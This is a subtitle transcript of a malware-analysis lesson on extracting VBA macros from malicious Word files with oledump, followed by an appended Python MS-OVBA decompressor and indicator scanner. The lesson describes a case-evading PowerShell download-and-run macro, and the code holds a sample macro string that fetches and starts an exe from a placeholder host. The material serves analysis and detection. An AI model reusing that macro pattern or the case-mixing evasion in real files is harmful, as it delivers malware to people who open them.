1
00:00:11,680 --> 00:00:13,220
Welcome back everyone.

2
00:00:13,240 --> 00:00:21,190
So let us start analyzing the malicious document file using oledump and I'll be sharing all these analysis

3
00:00:21,190 --> 00:00:22,210
files

4
00:00:22,430 --> 00:00:29,010
through a cloud link, probably through Dropbox. I'll password encrypt those files and I'll upload them there.

5
00:00:29,140 --> 00:00:34,990
And I'll share the links in the description section so you all can download the files and you

6
00:00:34,990 --> 00:00:42,610
can follow these videos by analyzing the same file so that it makes things much clearer to you.

7
00:00:44,400 --> 00:00:47,460
So let's quickly go ahead and launch PowerShell.

8
00:00:51,120 --> 00:00:58,090
Make sure to run it as administrator.

9
00:00:58,230 --> 00:01:08,420
So we are in the flare office directory. Now that's where we can start using the program, and our file

10
00:01:08,420 --> 00:01:10,370
is present here.

11
00:01:10,960 --> 00:01:24,380
So OK, so to start using oledump you have to use Python to run the oledump Python file.

12
00:01:26,370 --> 00:01:32,670
First move to the directory. Now python oledump.py

13
00:01:32,670 --> 00:01:40,230
So before we analyze any files, just quickly run the help command and see what parameters are there.

14
00:01:40,420 --> 00:01:44,980
So we have dump, we have ASCII dump, we have strings, we have

15
00:01:44,980 --> 00:01:47,180
VBA decompress.

16
00:01:47,260 --> 00:01:50,080
We have raw and a bunch of other things.

17
00:01:50,080 --> 00:01:52,330
You can explore all of these one by one.

18
00:01:52,570 --> 00:02:04,270
So in order to analyze a given doc file, all you have to do is run oledump.py and you

19
00:02:04,270 --> 00:02:08,620
have to pass your office file to this

20
00:02:11,230 --> 00:02:12,820
course files.

21
00:02:12,910 --> 00:02:15,210
It's called payment.doc.
22
00:02:15,640 --> 00:02:18,630
So let's run this file.

23
00:02:18,680 --> 00:02:21,820
So here is the output of oledump.

24
00:02:22,160 --> 00:02:31,500
So here you can see that it has separated all the objects one by one along with their sizes. It has listed

25
00:02:31,590 --> 00:02:37,680
the CompObject, the summary information, the table information; then it has also listed that there are

26
00:02:37,680 --> 00:02:42,330
macro projects inside this particular doc file.

27
00:02:42,330 --> 00:02:44,150
Now the one that would be interesting

28
00:02:44,160 --> 00:02:48,230
is object number 7, where it has marked a capital "M".

29
00:02:48,280 --> 00:02:54,060
And it means that this document particularly contains macro scripts inside it.

30
00:02:54,250 --> 00:03:01,450
Now in order to view the macro script, we have to run the same command, oledump.py, again, and

31
00:03:01,470 --> 00:03:11,930
this time we'll pass the hyphen x (-x) parameter along with the object number, which is 7. So here

32
00:03:11,960 --> 00:03:22,150
it will list the hex value of the object. In order to view a more readable format,

33
00:03:22,150 --> 00:03:27,740
we can basically pass the -d command, which just dumps the entire result.

34
00:03:27,820 --> 00:03:32,270
Now here you'll see that there are a lot of unwanted characters as well.

35
00:03:32,290 --> 00:03:40,780
These are basically the characters which didn't really get translated into directly readable ASCII

36
00:03:40,780 --> 00:03:47,380
characters, but it still makes a lot of sense. If you look at the code you'll see that it's basically

37
00:03:47,380 --> 00:03:54,330
trying to launch command.exe and it's trying to do something with PowerShell. In order to get rid of all

38
00:03:54,330 --> 00:03:56,460
these unwanted characters,

39
00:03:56,460 --> 00:04:02,640
we can basically do a VBA decompress and it will create a pretty nice script for us.
40
00:04:02,640 --> 00:04:10,680
So here, the output that we are seeing now is the actual VBA script that is embedded inside that

41
00:04:10,680 --> 00:04:12,210
particular document file.

42
00:04:12,390 --> 00:04:15,660
Now it makes it much easier to read and understand here.

43
00:04:16,020 --> 00:04:21,510
So if you see, it has defined a function called Document_Open, which means that this function will

44
00:04:21,510 --> 00:04:24,860
get executed as soon as the document is launched.

45
00:04:25,050 --> 00:04:31,170
What it does is that it launches a Shell command, where it passes cmd.exe, basically the command.exe,

46
00:04:31,170 --> 00:04:35,610
and from there it tries to launch PowerShell.

47
00:04:36,040 --> 00:04:42,310
Notice the way PowerShell has been mixed and matched with both upper and lower case characters.

48
00:04:42,310 --> 00:04:50,100
This is usually done to avoid static signature-based techniques where you have either powershell all

49
00:04:50,100 --> 00:04:53,330
in lower or in upper case characters.

50
00:04:53,400 --> 00:04:59,270
So all those techniques can be evaded using this kind of mixing and matching.

51
00:04:59,670 --> 00:05:03,300
After that it's basically trying to initiate a web client.

52
00:05:03,330 --> 00:05:07,570
And it's trying to download a file from this particular location.

53
00:05:07,950 --> 00:05:12,880
You can see the entire file location here and it's an exe file.

54
00:05:12,900 --> 00:05:14,950
It means it's an executable.

55
00:05:15,060 --> 00:05:21,270
It's very likely that this is the actual malware payload that will get downloaded from this particular

56
00:05:21,450 --> 00:05:22,500
office file.

57
00:05:22,680 --> 00:05:29,430
It gets written into temp app data, and it gets written with the name playa.exe.
58
00:05:29,760 --> 00:05:36,660
So once the file gets downloaded, the next command that gets executed is "Start" this particular file.

59
00:05:36,660 --> 00:05:37,900
Once the file is executed,

60
00:05:37,980 --> 00:05:40,610
you just exit the shell terminal.

61
00:05:41,070 --> 00:05:47,860
So this was the entire interpretation of the malicious VBA macro that was embedded inside the document.

62
00:05:48,030 --> 00:05:50,840
So this is where the delivery and exploitation phase happened.

63
00:05:50,850 --> 00:05:55,570
So in the delivery phase this document came in as an attachment to the e-mail.

64
00:05:55,710 --> 00:06:01,470
And once you launched that particular document, you basically executed this macro in the background and

65
00:06:01,620 --> 00:06:05,060
you just downloaded the malware and executed it on your system.

66
00:06:05,070 --> 00:06:11,530
And that was the exploitation phase.

67
00:06:11,690 --> 00:06:15,990
Let us try the other file as well, which is a docx file.

68
00:06:16,110 --> 00:06:18,410
It's called Statements.docx.

69
00:06:29,890 --> 00:06:37,420
So here if you see, object number A3 contains VBA macros, as marked by oledump.

70
00:06:37,570 --> 00:06:40,800
So we'll go ahead and pass -s along

71
00:06:40,800 --> 00:06:41,500
with

72
00:06:41,620 --> 00:06:43,900
the object number, which is A3.

73
00:06:44,170 --> 00:06:50,710
If you press enter, it throws in a bunch of output in hex format.

74
00:06:50,870 --> 00:07:05,290
Let's quickly do a VBA decompress on this, and this results in

75
00:07:05,390 --> 00:07:08,230
the following script.

76
00:07:08,300 --> 00:07:13,940
So once you have the script with you, you can just start analyzing it once again, just like we did

77
00:07:14,090 --> 00:07:16,290
in the previous video.

78
00:07:16,340 --> 00:07:23,790
So this is how we analyze malicious office files using oledump. In the next video,

79
00:07:23,810 --> 00:07:29,340
we'll try and understand how we can use the second tool to basically perform the same analysis.
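As an added example that is not part of the video, the course materials or oledump's own code, the following is a from-scratch implementation of the MS-OVBA (section 2.4.1) compression used for VBA module streams. It is what the VBA decompress step (-v) undoes when it turns the hex dump with its "unwanted characters" into readable source: the container is an LZ77-style stream of 4096-byte chunks, each a sequence of flag bytes followed by literal bytes or two-byte copy tokens whose offset/length split depends on how far into the chunk the decoder is. The compressor is included only so the decompressor can be exercised offline; the sample macro text, its URL and file names are constructed placeholders in the shape the video describes, and the known-answer vector is hand-assembled. The indicator scan at the end matches case-insensitively, which is the plain answer to the mixed-case "PoWeRsHeLl" trick pointed out in the video.

```python
# Added example, not oledump's or the course's code: a from-scratch MS-OVBA
# (section 2.4.1) compressor/decompressor for VBA module streams, which is
# what oledump -v undoes, plus a case-insensitive indicator scan of the source.
import re
import struct

SIGNATURE, CHUNK_DATA, CHUNK_SIG = 0x01, 4096, 0b011   # container sig, chunk size, header sig


def _bit_count(difference):
    """CopyToken.Help: ceil(log2(difference)), never below 4; sets the offset/length split."""
    return max((difference - 1).bit_length(), 4)


def decompress_stream(container):
    """Decompress a CompressedContainer into raw VBA module bytes."""
    if not container or container[0] != SIGNATURE:
        raise ValueError("not an MS-OVBA compressed container")
    out, pos = bytearray(), 1
    while pos < len(container):
        (header,) = struct.unpack_from("<H", container, pos)
        if (header >> 12) & 0x7 != CHUNK_SIG:
            raise ValueError("bad chunk signature at offset %d" % pos)
        end = min(len(container), pos + (header & 0x0FFF) + 3)   # chunk size incl. header
        pos, chunk_start = pos + 2, len(out)
        if not header >> 15:                                  # raw chunk: 4096 stored bytes
            out += container[pos:pos + CHUNK_DATA]
            pos += CHUNK_DATA
            continue
        while pos < end:                                      # token sequences
            flags, pos = container[pos], pos + 1
            for bit in range(8):
                if pos >= end:
                    break
                if not (flags >> bit) & 1:                    # literal token: one byte
                    out.append(container[pos])
                    pos += 1
                    continue
                (token,) = struct.unpack_from("<H", container, pos)   # copy token
                pos += 2
                bits = _bit_count(len(out) - chunk_start)     # split depends on position
                length = (token & (0xFFFF >> bits)) + 3
                src = len(out) - ((token >> (16 - bits)) + 1)
                if src < chunk_start:                         # offset must stay in this chunk
                    raise ValueError("copy token reaches before chunk start")
                for i in range(length):                       # byte-wise: source may overlap
                    out.append(out[src + i])
    return bytes(out)


def _compress_chunk(chunk):
    """TokenSequences: a flag byte, then up to 8 literal (1-byte) or copy (2-byte) tokens."""
    body, pos = bytearray(), 0
    while pos < len(chunk):
        flags, tokens = 0, bytearray()
        for bit in range(8):
            if pos >= len(chunk):
                break
            bits = _bit_count(pos)                            # pos is the in-chunk difference
            max_len, best = (0xFFFF >> bits) + 3, (0, 0)
            for cand in range(max(0, pos - (1 << bits)), pos):   # longest earlier match
                n = 0
                while n < max_len and pos + n < len(chunk) and chunk[cand + n] == chunk[pos + n]:
                    n += 1
                if n > best[1]:
                    best = (pos - cand, n)                    # (offset, length)
            offset, length = best
            if length >= 3:                                   # CopyToken: offset-1 high, length-3 low
                tokens += struct.pack("<H", ((offset - 1) << (16 - bits)) | (length - 3))
                flags |= 1 << bit
                pos += length
            else:
                tokens.append(chunk[pos])
                pos += 1
        body.append(flags)
        body += tokens
    return bytes(body)


def compress_stream(data):
    """Build a CompressedContainer; a chunk that would not fit is stored raw, zero-padded."""
    out = bytearray([SIGNATURE])
    for start in range(0, len(data), CHUNK_DATA):
        chunk = data[start:start + CHUNK_DATA]
        body = _compress_chunk(chunk)
        if len(body) > CHUNK_DATA:                            # flag 0, size field 0xFFF (4098 - 3)
            header, body = (CHUNK_SIG << 12) | 0xFFF, chunk.ljust(CHUNK_DATA, b"\x00")
        else:                                                 # flag 1, size field = len + 2 - 3
            header = 0x8000 | (CHUNK_SIG << 12) | (len(body) - 1)
        out += struct.pack("<H", header) + body
    return bytes(out)


INDICATORS = ("Document_Open", "AutoOpen", "Shell", "powershell", "WebClient", "DownloadFile")


def indicators(vba_text):
    """Indicators present in VBA source, matched ignoring case so PoWeRsHeLl is still caught."""
    return [w for w in INDICATORS if re.search(re.escape(w), vba_text, re.IGNORECASE)]


SAMPLE_VBA = (  # constructed in the shape the video describes; URL and names are placeholders
    'Attribute VB_Name = "ThisDocument"\r\nPrivate Sub Document_Open()\r\n'
    '    Shell "cmd.exe /c PoWeRsHeLl -w hidden -c ""(New-Object Net.WebClient)'
    ".DownloadFile('http://example.invalid/a.exe', $env:TEMP + '\\playa.exe'); "
    'Start $env:TEMP\\playa.exe"""\r\nEnd Sub\r\n'
)
# Hand-assembled: header 0xB00B, 8 literals, copy token 0x7005 (offset 8, length 8).
KNOWN_VECTOR = bytes.fromhex("01 0b b0 00") + b"abcdefgh" + bytes.fromhex("01 05 70")
```

To use `decompress_stream` on a real document, feed it the module stream starting at the text offset recorded in the project's `dir` stream (the `dir` stream is itself a compressed container from its first byte, while a module stream carries a performance cache before its container); that lookup is what oledump's -v does for you. The `src < chunk_start` check matters when parsing attacker-controlled files: a copy token whose offset points before the current chunk is a malformed container, not data, and a decoder that silently reads from earlier output will produce nonsense rather than an error.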